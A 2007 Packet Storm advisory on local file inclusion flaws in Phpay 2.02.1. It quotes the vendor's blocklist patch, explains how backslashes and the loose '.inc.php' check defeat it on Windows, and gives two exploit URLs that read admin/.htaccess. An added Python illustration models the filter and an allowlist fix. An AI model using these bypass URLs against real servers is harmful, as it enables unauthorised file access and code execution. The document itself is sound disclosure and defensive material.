phpay-lfi.txt

2007-12-18T00:00:00
ID PACKETSTORM:61866
Type packetstorm
Reporter Michael Brooks
Modified 2007-12-18T00:00:00

Description

By Michael Brooks
  
Vulnerability Type: Local File Inclusion

Software: Phpay

Homepage: http://sourceforge.net/projects/phpay/

Version Affected: 2.02.1
  
  
  
Phpay is affected by multiple local file include flaws; as a result, this patch was written:

$config = ereg_replace(":","", $config);
$config = trim(ereg_replace("../","", $config));
$config = trim(ereg_replace("/","", $config));
if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
if (!file_exists("$config")) { echo "panic: $config doesn't exist!! Did you backup it after installation? ..."; exit;}
require("./$config");
  
  
  
To bypass this patch, backslashes can be used instead of forward slashes on Windows systems.

Also, .inc.php only has to exist *somewhere* in the string.
  
Local File Include for Windows only:
  
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\\..\\admin\\.htaccess  
  
or if magic_quotes_gpc is turned on:  
  
http://localhost/phpayv2.02a/main.php?config=eregi.inc.php\..\admin\.htaccess  
  
  
  
Remote code execution is reachable in the ./admin/ folder.

The admin folder *should* be protected by a .htaccess file, similar to osCommerce 2.
  
  
  
Vulnerable configuration:

There is a call to extract($_GET), so the exploit will work regardless of register_globals. Using Linux is a very good fix for this issue.
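As an added illustration (not code from the advisory or from Phpay), the Python below re-implements the logic of the quoted filter and shows what the included path resolves to under Windows and POSIX path rules, which is why the backslash bypass only works on Windows. It also contrasts the blocklist with an allowlist check. ereg_replace and eregi use POSIX regexes, where "." matches any character, so "../" strips any two characters followed by "/" and ".inc.php" is matched by e.g. "xinc.php"; the re-implementation keeps that semantics. ntpath and posixpath stand in for the two platforms' path handling; DEFAULT_CONFIG, ALLOWED_CONFIGS and the second allowlisted name are constructed for this example.

```python
import ntpath
import posixpath
import re

DEFAULT_CONFIG = "config.inc.php"  # the fallback name used by the quoted patch

# Re-implementation of the blocklist filter quoted in the advisory.
# ereg_replace/eregi are POSIX regex functions, so "." is a wildcard:
# "../" matches any two characters followed by "/", and ".inc.php"
# matches e.g. "xinc.php". re.sub/re.search preserve that behaviour here.
def phpay_filter(config: str) -> str:
    config = config.replace(":", "")
    config = re.sub(r"../", "", config).strip()
    config = config.replace("/", "").strip()
    if config == "" or not re.search(r".inc.php", config, re.IGNORECASE):
        config = DEFAULT_CONFIG
    return config

# Path that require("./$config") would open after the filter, normalised
# with Windows (ntpath) or POSIX (posixpath) rules. On Windows "\" is a
# separator and ".." climbs a directory; on POSIX the whole string is one
# file name in the current directory.
def resolved_path(config: str, windows: bool) -> str:
    mod = ntpath if windows else posixpath
    return mod.normpath(mod.join(".", phpay_filter(config)))

# Hardened replacement: never build a path from user input; accept only an
# exact match against a fixed allowlist (constructed for this example).
ALLOWED_CONFIGS = {DEFAULT_CONFIG, "config.local.inc.php"}

def safe_config(config: str) -> str:
    # Defence in depth: separators of both platforms, drive/stream colons,
    # NUL and ".." are rejected outright, then the name must match the
    # allowlist exactly; anything else falls back to the default.
    if any(ch in config for ch in "/\\:\0") or ".." in config:
        return DEFAULT_CONFIG
    return config if config in ALLOWED_CONFIGS else DEFAULT_CONFIG

if __name__ == "__main__":
    sample = r"eregi.inc.php\..\admin\.htaccess"  # the advisory's sample input
    print("after filter :", phpay_filter(sample))
    print("Windows path :", resolved_path(sample, windows=True))
    print("POSIX path   :", resolved_path(sample, windows=False))
    print("allowlisted  :", safe_config(sample))
```

Run on the advisory's sample input, the filter leaves it untouched (no ":" or "/" present and ".inc.php" occurs in it); Windows normalisation turns it into admin\.htaccess, while POSIX normalisation keeps it as a single file name that does not exist. The allowlist check returns the default regardless of how the separators are spelled, which is the property the blocklist lacks.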
  
  
  
  
  
Merry Christmas